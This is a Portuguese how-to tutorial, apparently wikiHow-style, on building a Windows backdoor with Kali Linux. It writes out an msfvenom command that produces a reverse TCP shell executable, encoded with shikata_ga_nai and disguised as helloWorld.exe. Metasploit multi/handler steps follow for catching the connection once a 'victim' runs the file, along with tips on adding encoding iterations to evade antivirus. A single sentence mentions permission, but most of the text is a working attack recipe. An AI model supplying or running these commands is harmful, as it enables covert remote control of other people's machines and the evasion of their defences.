Um backdoor é usado para contornar os mecanismos de segurança, muitas vezes secretamente e, na maioria das vezes, de forma indetectável. Usando o MSFvenom, a combinação de msfpayload e msfencode, é possível criar um backdoor que se conecta de volta ao invasor usando TCP shell reverso. Para desenvolver um backdoor, você precisa alterar a assinatura do seu malware para escapar de qualquer software antivírus. Conclua este projeto em um par de computadores que você tem permissão para acessar e, no processo, você aprenderá mais sobre segurança de computador e como esse tipo de backdoor funciona.
Passos
Etapa 1. Inicie o Kali e acione o console do Terminal
Etapa 2. Digite ifconfig para exibir a interface e verificar seu endereço IP
Etapa 3. Digite msfvenom -l encoders para mostrar a lista de encoders
Você usará x86 / shikata_ga_nai como o codificador
Etapa 4. Digite "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --plataforma windows designa a arquitetura a ser usada.
- -p windows / shell / reverse_tcp designa as cargas úteis a serem incorporadas.
- LHOST designa o endereço IP do ouvinte.
- LPORT designa a porta do ouvinte.
- -b "\ x00" designa para evitar caracteres inválidos (bytes nulos).
- -e x86 / shikata_ga_nai designa o nome dos codificadores.
- -f exe> helloWorld.exe designa a saída do formato.
Etapa 5. Digite msfconsole para ativar o Metasploit
Agora você gerou sua porta dos fundos. Quando a vítima clica em helloWorld.exe, a carga útil do shell embutida será ativada e fará uma conexão de volta ao seu sistema. Para receber a conexão, você deve abrir o multi-handler no Metasploit e definir as cargas úteis
Etapa 6. Digite use exploit / multi / handler
Etapa 7. Digite set payload windows / shell / reverse_tcp
Etapa 8. Digite show options para verificar o módulo
Etapa 9. Digite set LHOST 192.168.48.129
"LHOST" designa o endereço IP do ouvinte
Etapa 10. Digite set LPORT 4444
"LPORT" designa a porta do ouvinte
Etapa 11. Digite run e aguarde a conexão da máquina da vítima
Etapa 12. Aguarde até que a vítima clique em helloWorld.exe
Então você será conectado com sucesso à máquina da vítima.
Pontas
- Usar -i no MSFvenom representará as iterações da codificação. Às vezes, mais iterações podem ajudar a evitar o software AV.
- Você aprendeu como gerar a porta dos fundos e codificá-la usando o MSFvenom, mas esse método não funcionará perfeitamente com alguns dos softwares AV hoje em dia. A razão por trás disso é por causa dos modelos de execução no MSFvenom. Os fornecedores de antivírus adicionaram a assinatura estática desses modelos e apenas procuram por eles. A solução para esse problema é usar um modelo de execução diferente ou ferramentas diferentes.